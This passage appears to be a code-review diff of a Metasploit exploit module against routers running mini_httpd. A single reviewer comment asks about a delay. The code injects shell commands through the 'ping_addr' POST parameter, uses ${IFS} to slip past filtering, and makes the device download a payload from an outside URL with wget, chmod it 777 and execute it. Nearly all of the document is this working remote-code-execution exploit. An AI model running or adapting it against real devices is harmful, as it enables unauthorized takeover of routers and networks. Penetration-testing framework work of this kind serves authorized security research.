modules/exploits/linux/http/multi_ncc_ping_exec.rb

```diff
@@ -0,0 +1,204 @@
+      if res && [500].include?(res.code) and res.headers["Server"] and res.headers["Server"] =~ /mini_httpd/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exec_command(cmd, timeout=20)
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri'    => normalize_uri(target_uri.path.to_s),
+        'encode_params' => false,
+        'vars_post' => {
+          "ccp_act" => "ping_v6",
+          "ping_addr" => '$(' + cmd + ')'
+        }
+      }, timeout)
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+
+  def primer
+    @payload_url = get_uri
+    wget_payload
+  end
+
+  def exploit
+    print_status("#{peer} - Accessing the vulnerable URL...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    @pl = generate_payload_exe
+
+    if @pl.blank?
+      fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
+    end
+    @payload_url  = ""
+
+    if datastore['EXTURL'].blank?
+      begin
+        Timeout.timeout(datastore['HTTPDELAY']) {super}
+      rescue Timeout::Error
+      end
+      chmod_payload
+      exec_payload
+    else
+      @payload_url = datastore['EXTURL']
+      wget_payload
+      chmod_payload
+      exec_payload
+    end
+  end
+
+  def wget_payload
+    #
+    # download payload
+    #
+    print_status("#{peer} - Downloading the payload to the target machine...")
+
+    @dropped_elf = rand_text_alpha(rand(5) + 3)
+
+    cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
+    res = exec_command(cmd)
+    if res && [200].include?(res.code) and res.headers["Server"] and res.headers["Server"] =~ /mini_httpd/
+      register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf))
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
+    end
+  end
+
+  def chmod_payload
+    #
+    # chmod
+    #
+    cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
+    print_status("#{peer} - chmod the payload...")
+
+    res = exec_command(cmd, 1)
+    if (!res)
+      fail_with(Failure::Unknown, "#{peer} - Unable to chmod payload")
+    end
+
+    select(nil, nil, nil, 1)
+  end
+
+  def exec_payload
+    #
+    # execute
+    #
+    cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)
+    print_status("#{peer} - Executing the payload...")
+
+    res = exec_command(cmd, 1)
+    if (!res)
+      fail_with(Failure::Unknown, "#{peer} - Unable to exec payload")
+    end
+
+    select(nil, nil, nil, 1)
```

Comment:
Is this delay really necessary :? Isn't the command executed once the response is back?